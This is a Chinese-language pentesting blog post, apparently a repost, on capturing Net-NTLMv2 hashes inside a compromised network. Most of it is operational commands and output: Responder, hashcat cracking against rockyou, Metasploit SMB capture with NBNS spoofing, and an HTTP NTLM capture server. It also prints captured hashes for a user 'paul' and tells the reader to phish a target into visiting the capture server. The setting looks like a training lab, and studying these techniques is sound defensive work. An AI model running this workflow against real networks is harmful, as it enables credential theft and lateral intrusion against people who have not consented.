狩猎NTLM v2 hash
Introduction在内网渗透中,我们有时候会遇到这么一种场景:通过web漏洞或其他方式获得了目标内网中一台机器的Windows交互式shell。由于权限和防护原因,我们既无法进行内网穿透,也无法 2023-5-29 17:1:53 Author: Matrix1024(查看原文) 阅读量:16 收藏
Introduction在内网渗透中,我们有时候会遇到这么一种场景:通过web漏洞或其他方式获得了目标内网中一台机器的Windows交互式shell。由于权限和防护原因,我们既无法进行内网穿透,也无法 2023-5-29 17:1:53 Author: Matrix1024(查看原文) 阅读量:16 收藏
NTLM Hashes (也称为 NT Hashes) 主要用于本地认证; NTLMv1 Hashes (也称为Net-NTLMv1 Hashes) 运用了WindowsNT挑战与响应验证机制结合,主要用于网络身份认证; NTLMv2 Hashes (也称为Net-NTLMv2 Hashes) 主要用于网络身份认证并且使用广泛; NTLM session 用于在没有NTLMv2身份验证的情况下协商NTLM2会话安全性时
sudo responder -I tun0hashcat -h | grep -i "ntlm"hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
msf6 > use auxiliary/server/capture/smbmsf6 auxiliary(server/capture/smb) > set srvhost 192.168.45.159srvhost => 192.168.45.159msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john_smbJOHNPWFILE => /tmp/john_smbmsf6 auxiliary(server/capture/smb) > exploit[*] Auxiliary module running as background job 0.[*] JTR hashes will be split into two files depending on the hash format.[*] /tmp/john_smb_netntlm for NTLMv1 hashes.[*] /tmp/john_smb_netntlmv2 for NTLMv2 hashes.[*] Server is running. Listening on 192.168.45.159:445[*] Server started.msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_responsemsf6 auxiliary(spoof/nbns/nbns_response) > set SPOOFIP 192.168.45.159SPOOFIP => 192.168.45.159msf6 auxiliary(spoof/nbns/nbns_response) > set INTERFACE tun0INTERFACE => tun0msf6 auxiliary(spoof/nbns/nbns_response) > run[*] Auxiliary module running as background job 2.[-] Auxiliary failed: PCAPRUB::BPFError invalid bpf filter: ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel[-] Call stack:[-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `setfilter'msf6 auxiliary(spoof/nbns/nbns_response) > [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `open_pcap'[-] /usr/share/metasploit-framework/modules/auxiliary/spoof/nbns/nbns_response.rb:145:in `run'[+] Received SMB connection on Auth Capture Server![SMB] NTLMv2-SSP Client : 192.168.219.211[SMB] NTLMv2-SSP Username : FILES01\paul[SMB] NTLMv2-SSP Hash : paul::FILES01:37deabe5fef5e9ae:6cf8e75e1fa372f9bdd3d2c687519959:010100000000000080aca5343b8dd901bb2665e62562c2aa000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080aca5343b8dd901060004000200000008003000300000000000000000000000002000007f1bd75bae0ffde594bca74c62b4d3cb1656aec27e52436eb09106e3ac6c5c580a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100350039000000000000000000
msf6 > use auxiliary/server/capture/http_ntlmmsf6 auxiliary(server/capture/http_ntlm) > set srvhost 192.168.45.159srvhost => 192.168.45.159msf6 auxiliary(server/capture/http_ntlm) > set SRVPORT 80SRVPORT => 80msf6 auxiliary(server/capture/http_ntlm) > set URIPATH /URIPATH => /msf6 auxiliary(server/capture/http_ntlm) > set JOHNPWFILE /home/kali/JOHNPWFILE => /home/kali/msf6 auxiliary(server/capture/http_ntlm) > exploit[*] Auxiliary module running as background job 0.msf6 auxiliary(server/capture/http_ntlm) >[*] Using URL: http://192.168.45.159/[*] Server started.[*] 2023-05-23 02:09:31 -0400NTLMv2 Response Captured from FILES01DOMAIN: USER: paulLMHASH:Disabled LM_CLIENT_CHALLENGE:DisabledNTHASH:e0f7edf0bb767cbd51e727f62b6722c4 NT_CLIENT_CHALLENGE:01010000000000005bc6d7223d8dd9015bebf059764da56f0000000002000c0044004f004d00410049004e000000000000000000
当我们配置并运行模块后,攻击主机这边就会启用http服务。然后钓鱼让目标用户去访问即可。当目标用户访问后,就会弹框提示登录。这时无论对方是否真的登录,我们都会抓到其Net-NTLM v2 hash。
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NzYxMjI5OA==&mid=2247485721&idx=1&sn=3194b1a87fc8d475fd417b425ff6cf90&chksm=c06e667cf719ef6a6d70f84566c351294172773a9d0a445fd18e0b872d95e8acdcfeb5a97f74#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh